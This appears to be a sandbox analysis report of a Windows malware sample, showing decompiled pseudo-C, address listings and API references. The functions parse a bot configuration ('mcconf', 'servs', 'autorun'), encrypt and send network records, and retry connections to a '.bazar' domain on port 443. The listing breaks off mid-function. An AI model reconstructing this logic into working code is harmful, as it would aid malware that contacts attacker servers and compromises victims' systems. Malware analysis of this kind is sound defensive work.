				_t69 =  *((intOrPtr*)( *((intOrPtr*)( *_t159 + 0x58))))(_t159,  &_v36, __edi, __esi, _t115);
				_t116 = __imp__#6;
				if(_t69 >= 0) {
					if(_v36 != 0xffff) {
						L22:
						_v32 = 1;
					} else {
						_push( &_v24);
						_push(_t159);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t159 + 0x30))))() >= 0) {
							_t84 = _v24;
							_push( &_v28);
							_push(_t84);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t84 + 0x20))))() >= 0) {
								_t161 = 0;
								if(_v28 <= 0) {
									goto L22;
								} else {
									while(1) {
										_t87 = _v20;
										if(_t87 != 0) {
											 *_t116(_t87);
										}
										_t88 = _v12;
										_v20 = 0;
										if(_t88 != 0) {
											 *_t116(_t88);
										}
										_t89 = _v16;
										_v12 = 0;
										if(_t89 != 0) {
											 *_t116(_t89);
										}
										_v16 = 0;
										E0039B1E0(_t116,  &_v44);
										_t91 = _v24;
										_push( &_v8);
										_push(_t161);
										_push(_t91);
										if( *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x1c))))() < 0) {
											goto L23;
										}
										_t94 = _v8;
										_t96 =  *((intOrPtr*)( *((intOrPtr*)( *_t94 + 0xa4))))(_t94,  &_v20);
										_t174 = _t96;
										if(_t96 >= 0) {
											E00399090(_t174,  &_v248, 0x25);
											_t131 =  *0x3b8628; // 0x593938
											_t162 = _t162 + 8;
											_push( &_v248);
											_push(_v20);
											if( *((intOrPtr*)( *((intOrPtr*)(_t131 + 0xe0))))() != 0) {
												L21:
												_t100 = _v8;
												 *((intOrPtr*)( *((intOrPtr*)( *_t100 + 8))))(_t100);
												_t161 = _t161 + 1;
												_v8 = 0;
												if(_t161 < _v28) {
													continue;
												} else {
													goto L22;
												}
											} else {
												_t103 = E0039A140( &_v44, _v8);
												_t176 = _t103;
												if(_t103 != 0) {
													E00399090(_t176,  &_v248, 0x26);
													_t163 = _t162 + 8;
													_t106 = E00391A10( &_v44,  &_v248,  &_v12);
													_t177 = _t106;
													if(_t106 != 0) {
														E00399090(_t177,  &_v248, 0x27);
														_t109 = E00391A10( &_v44,  &_v248,  &_v16);
														_push(0xc);
														L0039A47E();
														_t162 = _t163 + 0xc;
														if(_t109 == 0) {
															_t110 = 0;
															__eflags = 0;
														} else {
															_t110 = E00392120(_t109, _v12, _v16, 0);
														}
														if(E003A0A50(_v48, _t110) != 0) {
															goto L21;
														}
													}
												}
											}
										}
										goto L23;
									}
								}
							}
						}
					}
				}
				L23:
				_t70 = _v20;
				if(_t70 != 0) {
					 *_t116(_t70);
				}
				_t71 = _v12;
				if(_t71 != 0) {
					 *_t116(_t71);
				}
				_t72 = _v16;
				if(_t72 != 0) {
					 *_t116(_t72);
				}
				_t73 = _v8;
				if(_t73 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t73 + 8))))(_t73);
				}
				_t74 = _v24;
				_pop(_t117);
				if(_t74 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t74 + 8))))(_t74);
				}
				L003926B0(_t117,  &_v44);
				return _v32;
			}









































    0x0039dce3
    0x0039dce6
    0x0039dce9
    0x0039dcec
    0x0039dcef
    0x0039dcf2
    0x0039dcf5
    0x0039dcf8
    0x0039dcfb
    0x0039dd03
    0x0039dd06
    0x0039dd0b
    0x0039dd18
    0x0039dd1a
    0x0039dd22
    0x0039dd2d
    0x0039deaa
    0x0039deaa
    0x0039dd33
    0x0039dd3b
    0x0039dd3c
    0x0039dd41
    0x0039dd47
    0x0039dd4f
    0x0039dd50
    0x0039dd58
    0x0039dd5e
    0x0039dd63
    0x00000000
    0x00000000
    0x0039dd70
    0x0039dd70
    0x0039dd75
    0x0039dd78
    0x0039dd78
    0x0039dd7a
    0x0039dd7d
    0x0039dd82
    0x0039dd85
    0x0039dd85
    0x0039dd87
    0x0039dd8a
    0x0039dd8f
    0x0039dd92
    0x0039dd92
    0x0039dd97
    0x0039dd9a
    0x0039dd9f
    0x0039dda7
    0x0039dda8
    0x0039dda9
    0x0039ddb1
    0x00000000
    0x00000000
    0x0039ddb7
    0x0039ddc7
    0x0039ddc9
    0x0039ddcb
    0x0039ddda
    0x0039dde2
    0x0039dde8
    0x0039ddf1
    0x0039ddf8
    0x0039ddfd
    0x0039de92
    0x0039de92
    0x0039de9b
    0x0039de9d
    0x0039de9e
    0x0039dea4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0039de03
    0x0039de0a
    0x0039de0f
    0x0039de11
    0x0039de20
    0x0039de25
    0x0039de36
    0x0039de3b
    0x0039de3d
    0x0039de48
    0x0039de5e
    0x0039de63
    0x0039de65
    0x0039de6a
    0x0039de6f
    0x0039de83
    0x0039de83
    0x0039de71
    0x0039de7c
    0x0039de7c
    0x0039de90
    0x00000000
    0x00000000
    0x0039de90
    0x0039de3d
    0x0039de11
    0x0039ddfd
    0x00000000
    0x0039ddcb
    0x0039dd70
    0x0039dd63
    0x0039dd58
    0x0039dd41
    0x0039dd2d
    0x0039deb1
    0x0039deb1
    0x0039deb6
    0x0039deb9
    0x0039deb9
    0x0039debb
    0x0039dec0
    0x0039dec3
    0x0039dec3
    0x0039dec5
    0x0039deca
    0x0039decd
    0x0039decd
    0x0039decf
    0x0039ded4
    0x0039dedc
    0x0039dedc
    0x0039dede
    0x0039dee5
    0x0039dee6
    0x0039deee
    0x0039deee
    0x0039def3
    0x0039defe

    APIs
      • Part of subcall function 00393270: ??3@YAXPAX@Z.MSVCRT ref: 00393291
    • SysFreeString.OLEAUT32(?), ref: 0039DD78
    • SysFreeString.OLEAUT32(?), ref: 0039DD85
    • SysFreeString.OLEAUT32(?), ref: 0039DD92
      • Part of subcall function 0039B1E0: SysFreeString.OLEAUT32(?), ref: 0039B1F8
      • Part of subcall function 0039B1E0: SysFreeString.OLEAUT32(?), ref: 0039B201
    • ??2@YAPAXI@Z.MSVCRT ref: 0039DE65
      • Part of subcall function 003A0A50: ??2@YAPAXI@Z.MSVCRT ref: 003A0A7F
      • Part of subcall function 00392120: SysAllocString.OLEAUT32(00000000), ref: 00392131
      • Part of subcall function 00392120: SysAllocString.OLEAUT32(?), ref: 00392139
    • SysFreeString.OLEAUT32(?), ref: 0039DEB9
    • SysFreeString.OLEAUT32(?), ref: 0039DEC3
    • SysFreeString.OLEAUT32(?), ref: 0039DECD
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039AA60, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 195
    C-Code - Quality: 50%
    			E0039AA60(void* __ecx) {
				void* _v8;
				char _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				short _v40;
				char _v44;
				void* __edi;
				void* __esi;
				intOrPtr* _t61;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr* _t66;
				intOrPtr* _t67;
				intOrPtr* _t71;
				intOrPtr* _t76;
				void* _t77;
				char _t78;
				char _t79;
				intOrPtr* _t80;
				intOrPtr* _t83;
				intOrPtr _t87;
				intOrPtr* _t88;
				intOrPtr* _t90;
				void* _t93;
				intOrPtr _t95;
				void* _t127;
				void* _t128;
				void* _t130;

				_t127 = __ecx;
				_t61 =  *((intOrPtr*)(__ecx + 4));
				_v20 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				if(_t61 != 0) {
					_push( &_v20);
					_push(_t61);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t61 + 0xb4))))() >= 0) {
						_t71 = _v20;
						_push( &_v12);
						_push(_t71);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t71 + 0xa4))))() >= 0 && E003B10C0( &_v44, _v12) == 6 && _v44 == 0x6f63636d && _v40 == 0x666e) {
							_t76 = _v20;
							_t77 =  *((intOrPtr*)( *((intOrPtr*)( *_t76 + 0x34))))(_t76,  &_v8);
							if(_t77 >= 0) {
								_push(_t128);
								if(_t77 == 1) {
									L35:
									_v28 = 1;
								} else {
									while(1) {
										_t78 = _v12;
										if(_t78 != 0) {
											__imp__#6(_t78);
										}
										_t79 = _v16;
										_v12 = 0;
										if(_t79 != 0) {
											__imp__#6(_t79);
										}
										_t80 = _v8;
										_v16 = 0;
										_push( &_v12);
										_push(_t80);
										if( *((intOrPtr*)( *((intOrPtr*)( *_t80 + 0xa4))))() < 0) {
											goto L36;
										}
										_t83 = _v8;
										_push( &_v16);
										_push(_t83);
										if( *((intOrPtr*)( *((intOrPtr*)( *_t83 + 0x68))))() >= 0) {
											_t31 =  &_v44; // 0x6f63636d
											_t87 = E003B10C0(_t31, _v12);
											if(_t87 != 3) {
												if(_t87 != 4) {
													if(_t87 != 5) {
														if(_t87 != 7 || _v44 != 0x6f747561 || _v40 != 0x6e7572) {
															goto L33;
														} else {
															_t93 = E0039DCD0(_t127, _t127, _t128, _v8);
															goto L32;
														}
													} else {
														if(_v44 != 0x76726573 || _v40 != 0x73) {
															goto L33;
														} else {
															_t93 = E00393E30(_t127, _v8);
															L32:
															if(_t93 != 0) {
																goto L33;
															}
														}
													}
												} else {
													if(_v44 == 0x67617467) {
														_t95 =  *((intOrPtr*)(_t127 + 0x14));
														if(_t95 != 0) {
															_t95 = E0039BB40(_t95);
															_t130 = _t130 + 4;
														}
														__imp__#2(_v16);
														 *((intOrPtr*)(_t127 + 0x14)) = _t95;
													}
													goto L33;
												}
											} else {
												if(_v44 == 0x726576) {
													__imp___wtoi(_v16);
													_t130 = _t130 + 4;
													 *((intOrPtr*)(_t127 + 0x10)) = _t87;
												}
												L33:
												_t88 = _v8;
												_t128 =  *((intOrPtr*)( *((intOrPtr*)( *_t88 + 0x40))))(_t88,  &_v24);
												if(_t128 >= 0) {
													_t90 = _v8;
													 *((intOrPtr*)( *((intOrPtr*)( *_t90 + 8))))(_t90);
													_v8 = _v24;
													_v24 = 0;
													if(_t128 != 1) {
														continue;
													} else {
														goto L35;
													}
												}
											}
										}
										goto L36;
									}
								}
								L36:
							}
						}
					}
					_t64 = _v16;
					if(_t64 != 0) {
						__imp__#6(_t64);
					}
					_t65 = _v12;
					if(_t65 != 0) {
						__imp__#6(_t65);
					}
					_t66 = _v8;
					if(_t66 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t66 + 8))))(_t66);
					}
					_t67 = _v20;
					if(_t67 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t67 + 8))))(_t67);
					}
					return _v28;
				} else {
					return 0;
				}
			}

































    0x0039aa6a
    0x0039aa6c
    0x0039aa6f
    0x0039aa72
    0x0039aa75
    0x0039aa78
    0x0039aa7b
    0x0039aa7e
    0x0039aa83
    0x0039aa92
    0x0039aa93
    0x0039aa9e
    0x0039aaa4
    0x0039aaac
    0x0039aaad
    0x0039aab8
    0x0039aaee
    0x0039aafb
    0x0039aaff
    0x0039ab05
    0x0039ab09
    0x0039ac39
    0x0039ac39
    0x00000000
    0x0039ab10
    0x0039ab10
    0x0039ab15
    0x0039ab18
    0x0039ab18
    0x0039ab1e
    0x0039ab21
    0x0039ab26
    0x0039ab29
    0x0039ab29
    0x0039ab2f
    0x0039ab35
    0x0039ab3a
    0x0039ab3b
    0x0039ab46
    0x00000000
    0x00000000
    0x0039ab4c
    0x0039ab54
    0x0039ab55
    0x0039ab5d
    0x0039ab66
    0x0039ab69
    0x0039ab71
    0x0039ab95
    0x0039abc2
    0x0039abe4
    0x00000000
    0x0039abf8
    0x0039abfe
    0x00000000
    0x0039abfe
    0x0039abc4
    0x0039abcb
    0x00000000
    0x0039abd4
    0x0039abda
    0x0039ac03
    0x0039ac05
    0x00000000
    0x00000000
    0x0039ac05
    0x0039abcb
    0x0039ab97
    0x0039ab9e
    0x0039aba0
    0x0039aba5
    0x0039aba8
    0x0039abad
    0x0039abad
    0x0039abb4
    0x0039abba
    0x0039abba
    0x00000000
    0x0039ab9e
    0x0039ab73
    0x0039ab7a
    0x0039ab84
    0x0039ab8a
    0x0039ab8d
    0x0039ab8d
    0x0039ac07
    0x0039ac07
    0x0039ac16
    0x0039ac1a
    0x0039ac1c
    0x0039ac25
    0x0039ac2a
    0x0039ac2d
    0x0039ac33
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0039ac33
    0x0039ac1a
    0x0039ab71
    0x00000000
    0x0039ab5d
    0x0039ab10
    0x0039ac40
    0x0039ac40
    0x0039aaff
    0x0039aab8
    0x0039ac41
    0x0039ac46
    0x0039ac49
    0x0039ac49
    0x0039ac4f
    0x0039ac54
    0x0039ac57
    0x0039ac57
    0x0039ac5d
    0x0039ac62
    0x0039ac6a
    0x0039ac6a
    0x0039ac6c
    0x0039ac71
    0x0039ac79
    0x0039ac79
    0x0039ac83
    0x0039aa86
    0x0039aa8c
    0x0039aa8c

    APIs
    • SysFreeString.OLEAUT32(?), ref: 0039AC57
      • Part of subcall function 003B10C0: tolower.MSVCRT ref: 003B10FB
    • SysFreeString.OLEAUT32(?), ref: 0039AB18
    • SysFreeString.OLEAUT32(?), ref: 0039AB29
    • SysAllocString.OLEAUT32(?), ref: 0039ABB4
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    • _wtoi.MSVCRT ref: 0039AB84
      • Part of subcall function 0039DCD0: SysFreeString.OLEAUT32(?), ref: 0039DD78
      • Part of subcall function 0039DCD0: SysFreeString.OLEAUT32(?), ref: 0039DD85
      • Part of subcall function 0039DCD0: SysFreeString.OLEAUT32(?), ref: 0039DD92
      • Part of subcall function 0039DCD0: ??2@YAPAXI@Z.MSVCRT ref: 0039DE65
      • Part of subcall function 0039DCD0: SysFreeString.OLEAUT32(?), ref: 0039DEB9
      • Part of subcall function 0039DCD0: SysFreeString.OLEAUT32(?), ref: 0039DEC3
      • Part of subcall function 0039DCD0: SysFreeString.OLEAUT32(?), ref: 0039DECD
      • Part of subcall function 00393E30: SysFreeString.OLEAUT32(?), ref: 00393F48
      • Part of subcall function 00393E30: SysFreeString.OLEAUT32(?), ref: 00393F5D
      • Part of subcall function 00393E30: _wtoi.MSVCRT ref: 0039400E
      • Part of subcall function 00393E30: rand.MSVCRT ref: 00394080
      • Part of subcall function 00393E30: SysFreeString.OLEAUT32(?), ref: 0039422F
      • Part of subcall function 00393E30: SysFreeString.OLEAUT32(?), ref: 0039423D
    • SysFreeString.OLEAUT32(?), ref: 0039AC49
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003AFD0B, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184network
    C-Code - Quality: 18%
    			E003AFD0B(void* _a4, char _a8, signed int _a12) {
				char _v5;
				char _v6;
				char _v7;
				void* _v8;
				signed int _v9;
				char _v10;
				char _v11;
				void _v12;
				char* _v16;
				signed int _v20;
				void _v44;
				signed int _t83;
				signed int _t89;
				void* _t98;
				int _t99;
				short _t108;
				short _t109;
				signed int _t116;
				intOrPtr* _t120;
				signed int _t130;
				signed int _t132;
				void* _t146;
				int _t148;
				intOrPtr* _t153;
				void* _t155;
				void* _t156;
				signed int _t159;
				char* _t160;
				void* _t163;

				_t120 = _a4;
				_t148 = _a12;
				if(( *(_t120 + 0x10070) & 0x00000001) != 0 && _t148 != 0) {
					_t4 =  &_a8; // 0x3a407c
					E003AFD0B(_t120,  *_t4, 0);
					_t163 = _t163 + 0xc;
				}
				_t156 =  *0x3b8538(_t148 + 0x40);
				_a4 = _t156;
				_v16 =  *0x3b8538(_t148 + 0x40);
				_t83 =  *(_t120 + 0x10074);
				_v12 = _t83 >> 0x18;
				_v11 = _t83 >> 0x10;
				_v10 = _t83 >> 8;
				_v9 = _t83;
				_v8 = (_t83 << 0x00000020 |  *(_t120 + 0x10070)) >> 0x18;
				_v20 = _t83;
				_v7 = (_t83 << 0x00000020 |  *(_t120 + 0x10070)) >> 0x10;
				_v5 =  *(_t120 + 0x10070);
				 *_t156 = _v12;
				_v6 = (_t83 << 0x00000020 |  *(_t120 + 0x10070)) >> 8;
				 *((intOrPtr*)(_t156 + 4)) = _v8;
				_t89 =  *(_t120 + 0x10070) |  *(_t120 + 0x10074);
				if(_t89 != 0) {
					 *((char*)(_t156 + 8)) = 0x17;
				} else {
					 *((char*)(_t156 + 8)) = 0x16;
				}
				 *((short*)(_t156 + 9)) = 0x103;
				__imp__#9(_t148);
				_t43 =  &_a8; // 0x3a407c
				 *(_t156 + 0xb) = _t89;
				_t45 = _t156 + 0xd; // 0xd
				memcpy(_t45,  *_t43, _t148);
				E003AEC77(_t120 + 4, 0x14, _t156, _t148 + 0xd,  &_v44);
				_t49 =  &_a8; // 0x3a407c
				memcpy(_t156,  *_t49, _t148);
				_t146 = _t156 + _t148;
				_t130 = 5;
				memcpy(_t146,  &_v44, _t130 << 2);
				_t132 = _a12;
				_t159 = _t132 + 0x00000014 & 0x8000000f;
				if(_t159 < 0) {
					_t159 = (_t159 - 0x00000001 | 0xfffffff0) + 1;
				}
				_t98 = 0x10;
				_t99 = _t98 - _t159;
				if(_t99 != 0) {
					if(_t99 == 1) {
						_push(0x11);
						goto L12;
					}
				} else {
					_push(0x10);
					L12:
					_pop(_t99);
				}
				_t56 = _t132 + 0x14; // 0x25
				_v8 = _t99 + _t56;
				memset(_t146 + 0x14, _t99 - 1, _t99);
				_t160 = _v16;
				if(E003AEF6B(_a4, _t99 + _t56, _t160 + 5, _t120 + 0x2c, _t120 + 0x4c, 1) != 0) {
					if(( *(_t120 + 0x10070) |  *(_t120 + 0x10074)) != 0) {
						 *_t160 = 0x17;
					} else {
						 *_t160 = 0x16;
					}
					_t153 = __imp__#9;
					_t108 =  *_t153(0x301);
					 *((short*)(_t160 + 1)) = _t108;
					_t109 =  *_t153(_v8);
					_t155 = _v8 + 5;
					 *((short*)(_t160 + 3)) = _t109;
					__imp__#19( *_t120, _t160, _t155, 0);
					_v16 = _t109;
					 *0x3b8540(_t160);
					 *0x3b8540(_a4);
					 *(_t120 + 0x10070) =  *(_t120 + 0x10070) + 1;
					asm("adc dword [ebx+0x10074], 0x0");
					asm("sbb eax, eax");
					_t116 =  !( ~(_v16 - _t155)) & _a12;
				} else {
					 *0x3b8540(_t160);
					 *0x3b8540(_a4);
					_t116 = 0;
				}
				return _t116;
			}
































    0x003afd12
    0x003afd24
    0x003afd27
    0x003afd2e
    0x003afd32
    0x003afd37
    0x003afd37
    0x003afd44
    0x003afd4a
    0x003afd53
    0x003afd56
    0x003afd61
    0x003afd69
    0x003afd71
    0x003afd76
    0x003afd87
    0x003afd99
    0x003afd9c
    0x003afdb2
    0x003afdb8
    0x003afdba
    0x003afdc0
    0x003afdcc
    0x003afdd2
    0x003afdda
    0x003afdd4
    0x003afdd4
    0x003afdd4
    0x003afddf
    0x003afde5
    0x003afdec
    0x003afdef
    0x003afdf3
    0x003afdf7
    0x003afe0b
    0x003afe11
    0x003afe15
    0x003afe1d
    0x003afe22
    0x003afe28
    0x003afe2a
    0x003afe30
    0x003afe36
    0x003afe3c
    0x003afe3c
    0x003afe3f
    0x003afe40
    0x003afe42
    0x003afe4b
    0x003afe4d
    0x00000000
    0x003afe4d
    0x003afe44
    0x003afe44
    0x003afe4f
    0x003afe4f
    0x003afe4f
    0x003afe51
    0x003afe5b
    0x003afe5e
    0x003afe63
    0x003afe82
    0x003afea4
    0x003afeab
    0x003afea6
    0x003afea6
    0x003afea6
    0x003afeae
    0x003afeb9
    0x003afebe
    0x003afec2
    0x003afec9
    0x003afece
    0x003afed4
    0x003afedb
    0x003afede
    0x003afee7
    0x003afeed
    0x003afef7
    0x003aff02
    0x003aff06
    0x003afe84
    0x003afe85
    0x003afe8e
    0x003afe94
    0x003afe94
    0x003aff0f

    APIs
    • htons.WS2_32(?), ref: 003AFDE5
    • memcpy.MSVCRT ref: 003AFDF7
      • Part of subcall function 003AEC77: memset.MSVCRT ref: 003AEC88
      • Part of subcall function 003AEC77: memset.MSVCRT ref: 003AEC98
      • Part of subcall function 003AEC77: memcpy.MSVCRT ref: 003AECA7
      • Part of subcall function 003AEC77: memcpy.MSVCRT ref: 003AECB9
    • memcpy.MSVCRT ref: 003AFE15
    • memset.MSVCRT ref: 003AFE5E
      • Part of subcall function 003AEF6B: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000024,?,?,00000001,?,0000000F,00000010), ref: 003AEFA8
      • Part of subcall function 003AEF6B: CryptImportKey.ADVAPI32(00000000,00000000,0000001C,00000000,00000000,00000010,00000010), ref: 003AEFF7
      • Part of subcall function 003AEF6B: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 003AF00A
      • Part of subcall function 003AEF6B: memcpy.MSVCRT ref: 003AF01E
      • Part of subcall function 003AEF6B: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000000), ref: 003AF040
      • Part of subcall function 003AEF6B: CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 003AF05D
      • Part of subcall function 003AEF6B: CryptDestroyKey.ADVAPI32(?), ref: 003AF06A
      • Part of subcall function 003AEF6B: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003AF074
      • Part of subcall function 003AEF6B: memcpy.MSVCRT ref: 003AF0AA
      • Part of subcall function 003AEF6B: CryptDestroyKey.ADVAPI32(?), ref: 003AF0B5
      • Part of subcall function 003AEF6B: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003AF0C0
    • htons.WS2_32(00000301), ref: 003AFEB9
    • htons.WS2_32(?), ref: 003AFEC2
    • send.WS2_32(?,?,?,00000000), ref: 003AFED4
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B0DAA, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99
    C-Code - Quality: 92%
    			E003B0DAA(void* __eax, void* __ebx, intOrPtr __edi, intOrPtr __esi) {
				void* _t60;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t76;
				void* _t79;
				intOrPtr _t85;
				intOrPtr* _t86;
				intOrPtr _t87;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t92;
				intOrPtr _t94;
				intOrPtr _t100;
				void* _t102;
				intOrPtr _t104;
				intOrPtr _t106;
				intOrPtr _t116;
				intOrPtr* _t117;
				void* _t118;
				intOrPtr _t121;
				intOrPtr _t123;
				intOrPtr _t125;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t139;
				intOrPtr _t140;
				intOrPtr _t142;
				intOrPtr _t143;
				intOrPtr _t144;
				void* _t145;
				intOrPtr _t146;
				intOrPtr* _t148;
				void* _t149;
				intOrPtr _t150;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr _t153;
				void* _t154;
				void* _t156;
				void* _t157;

				L0:
				while(1) {
					L0:
					_t146 = __esi;
					_t140 = __edi;
					_t102 = __ebx;
					L0039A47E();
					_t157 = _t156 + 4;
					if(__eax == 0) {
						goto L6;
					} else {
						 *((intOrPtr*)(_t154 - 0x1c)) = L003B1DC0(_t76);
						goto L7;
					}
					L8:
					_t12 = _t154 - 0x90; // 0x736e6462
					 *((intOrPtr*)(_t154 - 0x80)) = 0x7261;
					 *((intOrPtr*)(_t154 - 0x84)) = 0x7a61622e;
					 *((intOrPtr*)(_t154 - 0x88)) = 0x74737572;
					 *((intOrPtr*)(_t154 - 0x8c)) = 0x74656661;
					 *((intOrPtr*)(_t154 - 0x90)) = _t140;
					_t79 = E00391170(_t12, 0xfde9, _t154 - 8, 0xffffffff);
					_t157 = _t157 + 0x10;
					if(_t79 == 0) {
						L51:
						_t61 =  *((intOrPtr*)(_t154 - 0x14));
						if( *((intOrPtr*)(_t154 - 0x14)) != 0) {
							E0039BB40(_t61);
							_t157 = _t157 + 4;
						}
						_t62 =  *((intOrPtr*)(_t154 - 0x10));
						if( *((intOrPtr*)(_t154 - 0x10)) != 0) {
							E0039BB40(_t62);
							_t157 = _t157 + 4;
						}
						_t63 =  *((intOrPtr*)(_t154 - 8));
						if( *((intOrPtr*)(_t154 - 8)) != 0) {
							E0039BB40(_t63);
							_t157 = _t157 + 4;
						}
						_t64 =  *((intOrPtr*)(_t154 - 0xc));
						if( *((intOrPtr*)(_t154 - 0xc)) != 0) {
							E0039BB40(_t64);
							_t157 = _t157 + 4;
						}
						_t65 =  *((intOrPtr*)(_t154 - 0x1c));
						if(_t65 != 0) {
							_push(_t65);
							L00391CB0();
						}
						_t66 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t66 + 0xac))))(0x3b8600);
						_t130 =  *0x3b8628; // 0x593938
						 *0x3b8618 =  *0x3b8618 - 1;
						 *((intOrPtr*)( *((intOrPtr*)(_t130 + 0xc4))))(0x3b8600);
						return  *((intOrPtr*)(_t154 - 0x18));
					}
					L9:
					_t148 =  *((intOrPtr*)(_t154 - 0x1c));
					_push(_t154 - 0x2c);
					_push( *((intOrPtr*)(_t154 - 8)));
					if( *((intOrPtr*)( *((intOrPtr*)( *_t148))))() != 0 &&  *((intOrPtr*)(_t154 - 0x2c)) == 0xc8) {
						L13:
						_t85 =  *((intOrPtr*)( *((intOrPtr*)( *_t148 + 0xc))))(_t154 - 0xc, _t154 - 0x28);
						__eflags = _t85;
						if(_t85 == 0) {
							goto L51;
						}
						L14:
						_t116 =  *((intOrPtr*)(_t154 - 0x28));
						__eflags = _t116 - 6;
						if(_t116 <= 6) {
							goto L51;
						}
						L15:
						_t86 =  *((intOrPtr*)(_t154 - 0xc));
						_t149 = _t116 + _t86;
						__eflags = _t86 - _t149;
						if(_t86 >= _t149) {
							L19:
							_t117 = _t86;
							__eflags = _t86 - _t149;
							if(_t86 >= _t149) {
								L25:
								_t118 = _t117 - _t86;
								__eflags = _t118 - 6;
								if(_t118 <= 6) {
									goto L51;
								}
								L26:
								__eflags = _t118 - 0x10;
								if(_t118 >= 0x10) {
									goto L51;
								}
								L27:
								_t87 = E00391170(_t86, 0, _t154 - 0x14, _t118);
								_t157 = _t157 + 0x10;
								__eflags = _t87;
								if(_t87 == 0) {
									goto L51;
								}
								L28:
								_t104 =  *((intOrPtr*)(_t154 + 0xc));
								_t150 = 0;
								__eflags = 0;
								while(1) {
									L29:
									_t88 = L003994D0(_t104,  *((intOrPtr*)(_t154 - 0x14)), 0x1bb);
									__eflags = _t88;
									if(_t88 != 0) {
										break;
									}
									L30:
									_t100 =  *0x3b8628; // 0x593938
									_t150 = _t150 + 1;
									 *((intOrPtr*)( *((intOrPtr*)(_t100 + 0xc8))))(0x7530);
									__eflags = _t150 - 0x14;
									if(_t150 < 0x14) {
										continue;
									}
									break;
								}
								L31:
								__eflags = _t150 - 0x14;
								if(_t150 == 0x14) {
									goto L51;
								}
								L32:
								_t151 = 0;
								__eflags = 0;
								 *((intOrPtr*)(_t154 - 4)) = 0;
								while(1) {
									L33:
									_t90 = E0039D890(_t151, __eflags,  *((intOrPtr*)(_t154 + 8)), _t104, _t154 - 4);
									_t157 = _t157 + 0xc;
									__eflags = _t90;
									if(_t90 == 0) {
										break;
									}
									L34:
									_t125 =  *0x3b8628; // 0x593938
									_t151 = _t151 + 1;
									 *((intOrPtr*)( *((intOrPtr*)(_t125 + 0xc8))))(0x7530);
									__eflags = _t151 - 0x14;
									if(__eflags < 0) {
										continue;
									}
									L35:
									L38:
									__eflags = _t151 - 0x14;
									if(_t151 == 0x14) {
										goto L51;
									}
									L39:
									_t143 =  *((intOrPtr*)(_t154 + 8));
									_t152 = 0;
									__eflags = 0;
									 *((intOrPtr*)(_t154 - 4)) = 0;
									while(1) {
										L40:
										_t92 = E003A1B80(_t152, _t143, _t104, _t154 - 4);
										_t157 = _t157 + 0xc;
										__eflags = _t92;
										if(_t92 == 0) {
											break;
										}
										L41:
										_t123 =  *0x3b8628; // 0x593938
										_t152 = _t152 + 1;
										 *((intOrPtr*)( *((intOrPtr*)(_t123 + 0xc8))))(0x7530);
										__eflags = _t152 - 0x14;
										if(_t152 < 0x14) {
											continue;
										}
										L42:
										L45:
										__eflags = _t152 - 0x14;
										if(_t152 == 0x14) {
											goto L51;
										}
										L46:
										_t153 = 0;
										__eflags = 0;
										_t145 = _t104 + 8;
										while(1) {
											L47:
											_t94 = E00391FE0(_t104, _t145, _t153,  *((intOrPtr*)(_t154 + 8)), _t104, _t145);
											_t157 = _t157 + 0xc;
											__eflags = _t94;
											if(_t94 != 0) {
												break;
											}
											L48:
											_t121 =  *0x3b8628; // 0x593938
											_t153 = _t153 + 1;
